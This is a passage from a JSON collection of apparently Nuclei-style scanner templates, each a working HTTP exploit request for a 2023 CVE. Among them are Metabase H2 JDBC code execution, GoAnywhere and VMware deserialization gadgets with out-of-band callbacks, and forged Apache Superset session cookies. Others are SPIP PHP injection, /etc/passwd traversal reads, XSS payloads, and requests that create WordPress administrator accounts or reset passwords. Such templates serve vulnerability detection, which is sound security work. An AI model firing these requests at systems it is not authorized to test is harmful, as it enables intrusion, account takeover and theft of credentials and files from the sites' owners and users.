Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-30256","info":{"name":"Webkul QloApps 1.5.2 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["xss onfocus=alert(document.domain) autofocus= xss","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT  INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"evil.com"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://evil.com/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\"></td>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0099","info":{"name":"Simple URLs < 115 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body, \"</script><svg/onload=alert(document.domain)>\")","contains(body_2, \"search_term\")"],"condition":"and"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST 